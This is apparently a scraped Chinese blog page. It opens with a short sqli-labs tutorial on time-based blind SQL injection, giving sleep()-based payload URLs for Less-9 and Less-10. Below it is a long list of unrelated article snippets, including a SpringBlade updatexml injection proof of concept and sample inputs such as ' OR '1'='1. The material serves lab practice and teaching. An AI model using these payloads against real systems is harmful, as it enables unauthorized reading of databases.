时间型盲注和bool型盲注应用场景不同之处在报错的返回上，从less-8我们知道，输入合法时他会返回正常页面“You are in......”，而非法输入时他没有返回任何东西，于是，我们可以根据这个特点跑盲注，通过他不同的返回页面来判断我们匹配的字符是否正确，而在less-9中合法输入与非合法输入它都返回一个页面，就是You are in.....

这样，我们就不能根据他页面的返回内容来判断匹配结果了，因此我们需要用延时函数sleep()对两种输入进行区分，可以构造如下语句：

[plain]  view plain 
                copy
http://localhost/sqli-labs-master/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115,0,sleep(5))%23  

这里的意思是，如果数据库名首字母的ascii码大于115，那么执行sleep(5)，延时5秒，此时标签栏会变成缓冲，于是，我们就可以判断匹配的结果了，盲注脚本与less-8类似，只需要加入sleep函数即可。

Less-10 基于时间的双引号盲注

把上面的改成单引号就行：

[plain]  view plain 
                   copy
http://localhost/sqli-labs-master/Less-9/?id=1" and if(ascii(substr(database(),1,1))>115,0,sleep(5))%23  

你可能感兴趣的:(SQL注入)

SpringBlade dict-biz/list 接口 SQL 注入漏洞文章永久免费只为良心 oracle 数据库
SpringBladedict-biz/list接口SQL注入漏洞POC:构造请求包查看返回包你的网址/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1漏洞概述在SpringBlade框架中，如果dict-biz/list接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询（PreparedSta
Web安全:Web体系架构存在的安全问题和解决方室程序员-张师傅前端安全 web安全前端
Web体系架构在提供丰富功能和高效服务的同时，也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面，对企业和个人造成不可估量的损失。以下是对Web体系架构中存在的安全问题及解决方案的详细分析：Web体系架构存在的安全问题注入攻击SQL注入：攻击者通过在输入字段中插入恶意SQL代码，操控后台数据库，窃取、篡改或删除数据。OS命令注入：攻击者通过输入字段插入恶意代码，执行系统
2021国家开放大学计算机网络安全技术形成性考核五 chaoliang.top 国开试题网络安全网络安全
本人还会继续更新其他国家开放大学的试题，请大家多多关注，如果有什么建议，还希望大家提出来，本人也好完善本人在测试答案的时候发现，本章考试回顾结果中明明选对了答案，但是提示错误的情况，并且该题没有提示正确答案，这种情况应该是国开试题出现bug导致，请大家不要担心，如果有追求完美的同学，多答几次，可能就会避开这种题，因为出题是随机的。1.SQL注入一般可通过网页表单直接输入选择多项：对错正确答案：对2
最新网络安全（黑客）——自学篇黑客小雨 web安全安全
*需要的小伙伴关注我第一阶段：基础操作入门，学习基础知识入门的第一步是学习一些当下主流的安全工具课程并配套基础原理的书籍，一般来说这个过程在1个月左右比较合适。在这个阶段，你已经对网络安全有了基本的了解。如果你学完了第一步，相信你已经在理论上明白了上面是sql注入，什么是xss攻击，对burp、msf、cs等安全工具也掌握了基础操作。这个时候最重要的就是开始打地基！所谓的“打地基”其实就是系统化的
Spring Interceptor Draper
Spring中使用Interceptor拦截器与Servlet的listener比较相似，同样是监听请求，同样需要配置，一个是在web.xml中，Spring拦截器是在Spring配置文件中拦截未登录用户访问某些连接拦截日志信息拦截SQL注入执行顺序是preHandle->controller->postHandle->afterCompletionSpringInterceptor属于链式调用，
HP 应用程序如何防止 SQL 注入攻击提高程序安全稳定性？ xiaohuojian1 android
在PHP应用程序中，防止SQL注入攻击是确保程序安全和稳定的关键步骤。SQL注入攻击可以让恶意用户通过操控SQL查询来访问、修改或删除数据库中的数据，严重时甚至可能导致系统的完全控制。以下是防止SQL注入攻击的有效策略和最佳实践，以帮助提高PHP应用程序的安全性和稳定性。一、使用预处理语句和参数化查询1.预处理语句https://github.com/xhj2/p/issues/7预处理语句是防止
Web应用防火墙 Smile灬凉城666 网络安全 WAF 安全
一、定义与目的WAF是一种特殊类型的防火墙，专门设计用于监视、过滤和阻挡进出Web应用的HTTP流量。其主要目的是保护Web应用免受如XSS（跨站脚本）、SQL注入、会话劫持等网络攻击。二、工作原理WAF工作在应用层，即OSI模型的第七层。它通过对HTTP/HTTPS请求进行解析、协议检测、攻击识别和恶意行为阻断等步骤来保护Web应用。具体来说，WAF会解析进入Web应用的HTTP/HTTPS请求
Web安全与网络安全：SQL漏洞注入 hong161688 web安全 sql oracle
Web安全与网络安全：SQL漏洞注入引言在Web安全领域，SQL注入漏洞（SQLInjectionVulnerability）是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段，从而操纵后台数据库系统，执行未授权的数据库查询，甚至可能获取数据库管理权限，进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
Web安全与网络安全：SQL漏洞注入 bigbig猩猩 typescript vue.js 前端
Web安全与网络安全：SQL漏洞注入引言在Web安全领域，SQL注入漏洞（SQLInjectionVulnerability）是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段，从而操纵后台数据库系统，执行未授权的数据库查询，甚至可能获取数据库管理权限，进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
Web安全之SQL注入：如何预防及解决 J老熊 Java Web安全 web安全 sql 数据库系统架构面试
SQL注入（SQLInjection）是最常见的Web应用漏洞之一，它允许攻击者通过注入恶意SQL代码来操作数据库，获取、修改或删除数据。作为Java开发者，理解并防止SQL注入攻击是至关重要的。在本篇文章中，我们将详细介绍SQL注入的原理，演示如何在电商交易系统中出现SQL注入漏洞，并提供正确的防范措施和解决方案。1.什么是SQL注入？SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式
Java Web安全与Spring Config对象实战福建低调
本文还有配套的精品资源，点击获取简介：本课程深入探讨JavaWeb开发中的安全实践，包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时，介绍SpringSecurity框架的应用，以及Config对象在Spring配置管理中的作用，包括依赖注入和外部化配置。课程还包括实战演练，通过设置安全环境和安全漏洞模拟，帮助开发者提升应用的安全性和故障排查能力。1.Web安全
XSS和sql注入部分场景测试用例样例谷隐凡二测试 xss sql 测试用例
目录1.SQL注入测试用例设计基本SQL注入复杂SQL注入盲注测试2.XSS攻击测试用例设计基本XSS攻击复杂XSS攻击DOM-basedXSS1.SQL注入测试用例设计SQL注入攻击通常通过在输入字段中插入恶意SQL代码，试图操纵数据库查询。设计这些测试用例时，需要涵盖各种常见的SQL注入技术。基本SQL注入用例1:使用单引号:输入:'OR'1'='1预期结果:应拒绝输入并返回错误消息，不应允许
Java代码审计篇：SQL注入 zkzq 数据库
一、常见SQL注入1、sql语句动态拼接示例代码：Stringid=request.getParameter("id");res=st.executeQuery("SELECT*FROM\"IWEBSEC\".\"user\"WHERE\"id\"="+id);while(res.next()){intp=res.getInt("id");Stringn=res.getString("userna
Mybatis 防止sql注入 Ferrari1001
SQL****注入是一种代码注入技术，用于攻击数据驱动的应用，恶意的****SQL****语句被插入到执行的实体字段中（例如，为了转储数据库内容给攻击者）。[摘自]SQLinjection-WikipediaSQL****注入，大家都不陌生，是一种常见的攻击方式。攻击者在界面的表单信息或URL上输入一些奇怪的SQL片段（例如“or‘1’=’1’”这样的语句），有可能入侵参数检验不足的应用程序。所以
sql注入常用函数 web安全工具库小课堂 sql注入常用函数
当所有情绪都堆在一起的时候，才发现自己已经不是那个一块糖就能开心的小孩子了。。。----网易云热评一、MySql注入常用函数1、system_user()系统用户名2、user()用户名3、current_user()当前用户名4、session_user()链接数据库的用户名5、database()数据库名6、version()数据库版本7、@@datadir数据库路径8、@@basedir数据
python自动化笔记：操作mysql数据库 zhoukeguai python自动化笔记数据库 python 自动化
操作mysql数据库常见方法1、第三方库：pymysql1.1、安装pymysql1.2、连接数据库1.3、连接指定数据库1.4创建数据库、创建表1.5、表中插入数据1.6、批量插入数据1.7、获取查询结果数据1.8、防sql注入，sql语句中一般用占位符传值2、标准库：mysql.connector2.1、安装mysql-connector2.2、操作方法1、第三方库：pymysql1.1、安装
Node.js 入门：中间件与安全性深度解析 Switch616 前端 node.js 中间件 chrome 服务器架构前端前端框架
Node.js入门：中间件与安全性深度解析目录认证与授权使用jsonwebtoken实现JWT身份验证用户注册与登录：认证流程与实践️权限管理：安全访问控制详解️安全性防止SQL注入：参数化查询与ORM的最佳实践防止XSS攻击：用户输入处理与安全防护使用HTTPS和SSL/TLS：加密传输与数据安全⚠️错误处理️全局错误处理：确保应用稳定性的关键异常捕获与日志记录：有效排查问题的核心认证与授权使用
SQL注入漏洞检测 Kali与编程～ sql 网络安全
预计更新SQL注入概述1.1SQL注入攻击概述1.2SQL注入漏洞分类1.3SQL注入攻击的危害SQLMap介绍2.1SQLMap简介2.2SQLMap安装与配置2.3SQLMap基本用法SQLMap进阶使用3.1SQLMap高级用法3.2SQLMap配置文件详解3.3SQLMap插件的使用SQL注入漏洞检测4.1SQL注入漏洞检测基础4.2SQL注入漏洞检测工具4.3SQL注入漏洞检测实战SQL
sql注入漏洞 mineflame_ sql
所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行指定的SQL语句。主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤，转义，限制或处理不严谨，导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。具体来说，它是利用现有应用程序，将SQL语句注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入
Oracle（107）什么是数据库防火墙（Database Firewall）？辞暮尔尔-烟火年年 Oracle 数据库 oracle
数据库防火墙（DatabaseFirewall）是一种安全技术，用于监控和控制对数据库的访问，以防止未经授权的访问、SQL注入攻击和其他恶意活动。数据库防火墙可以实时分析和过滤SQL查询，确保只有合法的、预期的查询能够到达数据库，从而保护数据库的完整性和安全性。数据库防火墙的主要功能SQL语句分析和过滤：实时分析传入的SQL语句，阻止恶意或未经授权的SQL语句。行为基准：建立正常SQL语句的基准，
java sql注入正则表达式_Java程序员从笨鸟到菜鸟之（一百零二）sql注入攻击详解（三）sql注入解决办法... 用看智障的眼神看 java sql注入正则表达式
我们了解了sql注入原理和sql注入过程，今天我们就来了解一下sql注入的解决办法。怎么来解决和防范sql注入，由于本人主要是搞javaweb开发的小程序员，所以这里我只讲一下有关于javaweb的防止办法。其实对于其他的，思路基本相似。下面我们先从web应用程序的角度来看一下如何避免sql注入：1、普通用户与系统管理员用户的权限要有严格的区分。如果一个普通用户在使用查询语句中嵌入另一个DropT
php操作mysql防止sql注入(合集) get200 mysql mysql注入
本文将从sql注入风险说起，并且比较addslashes、mysql_escape_string、mysql_real_escape_string、mysqli和pdo的预处理的区别。当一个变量从表单传入到php，需要查询mysql的话，需要进行处理。举例：$unsafe_variable=$_POST[‘user_input’];mysqli_query(“INSERTINTOtable(col
基于流谱理论的SSL/TLS协议攻击检测方法米朵儿技术屋大数据与数字化的设计应用专栏 ssl 网络协议网络
摘要网络攻击检测在网络安全中扮演着重要角色。网络攻击检测的对象主要为僵尸网络、SQL注入等攻击行为。随着安全套接层/安全传输层（SSL/TLS）加密协议的广泛使用，针对SSL/TLS协议本身发起的SSL/TLS攻击日益增多，因此通过搭建网络流采集环境，构建了包含4种SSL/TLS攻击网络流与正常网络流的网络流数据集。针对当前网络攻击流检测的可观测性有限、网络流原始时空域分离性有限等问题，提出流谱理
【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有这一篇真的够了 webfker from 0 to 1 github git java
目录面经牛客奇安信面经（五星推荐）牛客面经（推荐）渗透测试面经（推荐）渗透测试技巧计网面经SQL注入漏洞注入绕过XXE漏洞最强面经Github面经模拟面WEB安全PHP安全网络安全密码学一、青藤二、360三、漏洞盒子四、未知厂商五、长亭-红队六、qax七、天融信八、安恒九、长亭十、国誉网安十一、360-红队十二、天融信十三、长亭-2十四、360-2十五、极盾科技十六、阿里十七、长亭3十八、qax-
javaWeb安全漏洞修复总结 dechen6073 java 数据库 web安全
1Web安全介绍12SQL注入、盲注12.1SQL注入、盲注概述12.2安全风险及原因22.3AppScan扫描建议22.4应用程序解决方案43会话标识未更新73.1会话标识未更新概述73.2安全风险及原因分析73.3AppScan扫描建议83.4应用程序解决方案84已解密登录请求84.1已解密登录请求概述84.2安全风险及原因分析84.3AppScan扫描建议94.4应用程序解决方案95跨站点请
Web攻击-XSS、CSRF、SQL注入 rrrobber 前端 xss csrf
1.XSS攻击：跨站脚本攻击XSS（CrossSiteScripting），跨站脚本攻击，允许攻击者将恶意代码植入到提供给其它用户使用的页面中。XSS的攻击目标是为了盗取存储在客户端的cookie或者其他网站用于识别客户端身份的敏感信息。一旦获取到合法用户的信息后，攻击者甚至可以假冒合法用户与网站进行交互。根据攻击来源被分为存储型、反射型、DOM型1.1.存储型存储型XSS的攻击步骤：攻击者将恶意
【网络安全】SQL注入详解白袍无涯 sql web安全数据库网络安全系统安全
一、什么是sql注入SQL注入是比较常见的网络攻击方式之一，它不是利用操作系统的BUG来实现攻击，而是针对程序员编写时的疏忽，通过SQL语句，实现无账号登录，甚至篡改数据库。二、SQL注入攻击的总体思路1：寻找到SQL注入的位置2：判断服务器类型和后台数据库类型3：针对不同的服务器和数据库特点进行SQL注入攻击三、SQL注入攻击实例Stringsql="select*fromuser_tablew
ctfshow-web入门-sql注入-web172 HkD01L ctfshow SQL注入 sql 数据库
题目描述查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromctfshow_user2whereusername!='flag'andid='".$_GET['id']."'limit1;";返回逻辑//检查结果是否有flagif($row->
用友U8 Cloud RepAddToTaskAction SQL注入漏洞复现天官赐福万无禁忌漏洞复现安全 web安全
1产品简介用友U8Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。2漏洞概述用友U8CloudRepAddToTaskAction接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。3影响范围
SQL 注入新视角：堆查询、JSON 与头部 XFF 注入剖析及防范白袍无涯 sql 安全 web安全网络安全计算机网络安全架构系统安全
在SQL注入攻击的世界中，除了一些常见的注入方式外，还有堆查询注入、JSON注入以及头部XFF注入等较为特殊的攻击手段。这些攻击方式利用不同的场景和漏洞，对数据库安全构成严重威胁。本文将详细介绍这三种SQL注入攻击方式的原理和特点。一、堆查询注入1.原理堆查询注入是一种利用数据库中可以同时执行多个查询的特性进行攻击的方法。在某些数据库系统中，可以通过分号将多个查询语句连接起来执行。攻击者利用这个特
eclipse maven IXHONG eclipse
eclipse中使用maven插件的时候，运行run as maven build的时候报错 -Dmaven.multiModuleProjectDirectory system propery is not set. Check $M2_HOME environment variable and mvn script match. 可以设一个环境变量M2_HOME指
timer cancel方法的一个小实例 alleni123 多线程 timer
package com.lj.timer; import java.util.Date; import java.util.Timer; import java.util.TimerTask; public class MyTimer extends TimerTask { private int a; private Timer timer; pub
MySQL数据库在Linux下的安装 ducklsl mysql
1.建好一个专门放置MySQL的目录 /mysql/db数据库目录 /mysql/data数据库数据文件目录 2.配置用户，添加专门的MySQL管理用户 >groupadd mysql ----添加用户组 >useradd -g mysql mysql ----在mysql用户组中添加一个mysql用户 3.配置，生成并安装MySQL >cmake -D
spring------>>cvc-elt.1: Cannot find the declaration of element Array_06 spring bean
将-------- <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3
maven发布第三方jar的一些问题 cugfy maven
maven中发布第三方jar到nexus仓库使用的是 deploy:deploy-file命令有许多参数，具体可查看 http://maven.apache.org/plugins/maven-deploy-plugin/deploy-file-mojo.html 以下是一个例子： mvn deploy:deploy-file -DgroupId=xpp3
MYSQL下载及安装 357029540 mysql
好久没有去安装过MYSQL，今天自己在安装完MYSQL过后用navicat for mysql去厕测试链接的时候出现了10061的问题，因为的的MYSQL是最新版本为5.6.24，所以下载的文件夹里没有my.ini文件，所以在网上找了很多方法还是没有找到怎么解决问题，最后看到了一篇百度经验里有这个的介绍，按照其步骤也完成了安装，在这里给大家分享下这个链接的地址
ios TableView cell的布局张亚雄 tableview
cell.imageView.image = [UIImage imageNamed:[imageArray objectAtIndex:[indexPath row]]]; CGSize itemSize = CGSizeMake(60, 50); &nbs
Java编码转义 adminjun java 编码转义
import java.io.UnsupportedEncodingException; /** * 转换字符串的编码 */ public class ChangeCharset { /** 7位ASCII字符，也叫作ISO646-US、Unicode字符集的基本拉丁块 */ public static final Strin
Tomcat 配置和spring aijuans spring
简介 Tomcat启动时，先找系统变量CATALINA_BASE，如果没有，则找CATALINA_HOME。然后找这个变量所指的目录下的conf文件夹，从中读取配置文件。最重要的配置文件：server.xml 。要配置tomcat，基本上了解server.xml，context.xml和web.xml。 Server.xml -- tomcat主
Java打印当前目录下的所有子目录和文件 ayaoxinchao 递归 File
其实这个没啥技术含量，大湿们不要操笑哦，只是做一个简单的记录，简单用了一下递归算法。 import java.io.File; /** * @author Perlin * @date 2014-6-30 */ public class PrintDirectory { public static void printDirectory(File f
linux安装mysql出现libs报冲突解决 BigBird2012 linux
linux安装mysql出现libs报冲突解决安装mysql出现 file /usr/share/mysql/ukrainian/errmsg.sys from install of MySQL-server-5.5.33-1.linux2.6.i386 conflicts with file from package mysql-libs-5.1.61-4.el6.i686
jedis连接池使用实例 bijian1013 redis jedis连接池 jedis
实例代码： package com.bijian.study; import java.util.ArrayList; import java.util.List; import redis.clients.jedis.Jedis; import redis.clients.jedis.JedisPool; import redis.clients.jedis.JedisPoo
关于朋友 bingyingao 朋友兴趣爱好维持
成为朋友的必要条件：志相同，道不合，可以成为朋友。譬如马云、周星驰一个是商人，一个是影星，可谓道不同，但都很有梦想，都要在各自领域里做到最好，当他们遇到一起，互相欣赏，可以畅谈两个小时。志不同，道相合，也可以成为朋友。譬如有时候看到两个一个成绩很好每次考试争做第一，一个成绩很差的同学是好朋友。他们志向不相同，但他
【Spark七十九】Spark RDD API一 bit1129 spark
aggregate package spark.examples.rddapi import org.apache.spark.{SparkConf, SparkContext} //测试RDD的aggregate方法 object AggregateTest { def main(args: Array[String]) { val conf = new Spar
ktap 0.1 released bookjovi kernel tracing
Dear, I'm pleased to announce that ktap release v0.1, this is the first official release of ktap project, it is expected that this release is not fully functional or very stable and we welcome bu
能保存Properties文件注释的Properties工具类 BrokenDreams properties
今天遇到一个小需求：由于java.util.Properties读取属性文件时会忽略注释，当写回去的时候，注释都没了。恰好一个项目中的配置文件会在部署后被某个Java程序修改一下，但修改了之后注释全没了，可能会给以后的参数调整带来困难。所以要解决这个问题。 &nb
读《研磨设计模式》-代码笔记-外观模式-Facade bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ /* * 百度百科的定义： * Facade（外观）模式为子系统中的各类（或结构与方法）提供一个简明一致的界面， * 隐藏子系统的复杂性，使子系统更加容易使用。他是为子系统中的一组接口所提供的一个一致的界面 * * 可简单地
After Effects教程收集 cherishLC After Effects
1、中文入门 http://study.163.com/course/courseMain.htm?courseId=730009 2、videocopilot英文入门教程（中文字幕） http://www.youku.com/playlist_show/id_17893193.html 英文原址： http://www.videocopilot.net/basic/ 素
Linux Apache 安装过程 crabdave apache
Linux Apache 安装过程下载新版本： apr-1.4.2.tar.gz（下载网站：http://apr.apache.org/download.cgi） apr-util-1.3.9.tar.gz（下载网站：http://apr.apache.org/download.cgi） httpd-2.2.15.tar.gz（下载网站：http://httpd.apac
Shell学习之变量赋值和引用 daizj shell 变量引用赋值
本文转自：http://www.cnblogs.com/papam/articles/1548679.html Shell编程中，使用变量无需事先声明，同时变量名的命名须遵循如下规则：首个字符必须为字母（a-z，A-Z）中间不能有空格，可以使用下划线（_）不能使用标点符号不能使用bash里的关键字（可用help命令查看保留关键字）需要给变量赋值时，可以这么写：
Java SE 第一讲（Java SE入门、JDK的下载与安装、第一个Java程序、Java程序的编译与执行） dcj3sjt126com java jdk
Java SE 第一讲： Java SE：Java Standard Edition Java ME: Java Mobile Edition Java EE：Java Enterprise Edition Java是由Sun公司推出的（今年初被Oracle公司收购）。收购价格：74亿美金 J2SE、J2ME、J2EE JDK：Java Development
YII给用户登录加上验证码 dcj3sjt126com yii
1、在SiteController中添加如下代码： /** * Declares class-based actions. */ public function actions() { return array( // captcha action renders the CAPTCHA image displ
Lucene使用说明 dyy_gusi Lucene search 分词器
Lucene使用说明 1、lucene简介 1.1、什么是lucene Lucene是一个全文搜索框架，而不是应用产品。因此它并不像baidu或者googleDesktop那种拿来就能用，它只是提供了一种工具让你能实现这些产品和功能。 1.2、lucene能做什么要回答这个问题，先要了解lucene的本质。实际
学习编程并不难,做到以下几点即可! gcq511120594 数据结构编程算法
不论你是想自己设计游戏，还是开发iPhone或安卓手机上的应用，还是仅仅为了娱乐，学习编程语言都是一条必经之路。编程语言种类繁多，用途各异，然而一旦掌握其中之一，其他的也就迎刃而解。作为初学者，你可能要先从Java或HTML开始学，一旦掌握了一门编程语言，你就发挥无穷的想象，开发各种神奇的软件啦。 1、确定目标学习编程语言既充满乐趣，又充满挑战。有些花费多年时间学习一门编程语言的大学生到
Java面试十问之三：Java与C++内存回收机制的差别 HNUlanwei java C++finalize()堆栈内存回收
大家知道， Java 除了那 8 种基本类型以外，其他都是对象类型（又称为引用类型）的数据。 JVM 会把程序创建的对象存放在堆空间中，那什么又是堆空间呢？其实，堆（ Heap）是一个运行时的数据存储区，从它可以分配大小各异的空间。一般，运行时的数据存储区有堆（ Heap）和堆栈（ Stack），所以要先看它们里面可以分配哪些类型的对象实体，然后才知道如何均衡使用这两种存储区。一般来说，栈中存放的
第二章 Nginx+Lua开发入门 jinnianshilongnian nginx lua
Nginx入门本文目的是学习Nginx+Lua开发，对于Nginx基本知识可以参考如下文章： nginx启动、关闭、重启 http://www.cnblogs.com/derekchen/archive/2011/02/17/1957209.html agentzh 的 Nginx 教程 http://openresty.org/download/agentzh-nginx-tutor
MongoDB windows安装基本命令 liyonghui160com
windows安装安装目录： D:\MongoDB\ 新建目录 D:\MongoDB\data\db 4.启动进城： cd D:\MongoDB\bin mongod -dbpath D:\MongoDB\data\db &n
Linux下通过源码编译安装程序 pda158 linux
一、程序的组成部分　　Linux下程序大都是由以下几部分组成：　　二进制文件：也就是可以运行的程序文件　　库文件：就是通常我们见到的lib目录下的文件　　配置文件：这个不必多说，都知道　　帮助文档：通常是我们在linux下用man命令查看的命令的文档　　二、linux下程序的存放目录　　linux程序的存放目录大致有三个地方：　　/etc, /b
WEB开发编程的职业生涯４个阶段 shw3588 编程 Web 工作生活
觉得自己什么都会 2007年从学校毕业，凭借自己原创的ASP毕业设计，以为自己很厉害似的，信心满满去东莞找工作，找面试成功率确实很高，只是工资不高，但依旧无法磨灭那过分的自信，那时候什么考勤系统、什么OA系统、什么ERP，什么都觉得有信心，这样的生涯大概持续了约一年。根本不是自己想的那样 2008年开始接触很多工作相关的东西，发现太多东西自己根本不会，都需要去学，不管是asp还是js，
遭遇jsonp同域下变作post请求的坑 vb2005xu jsonp 同域post
今天迁移一个站点时遇到一个坑爹问题,同一个jsonp接口在跨域时都能调用成功,但是在同域下调用虽然成功,但是数据却有问题. 此处贴出我的后端代码片段 $mi_id = htmlspecialchars(trim($_GET['mi_id '])); $mi_cv = htmlspecialchars(trim($_GET['mi_cv '])); 贴出我前端代码片段: $.aj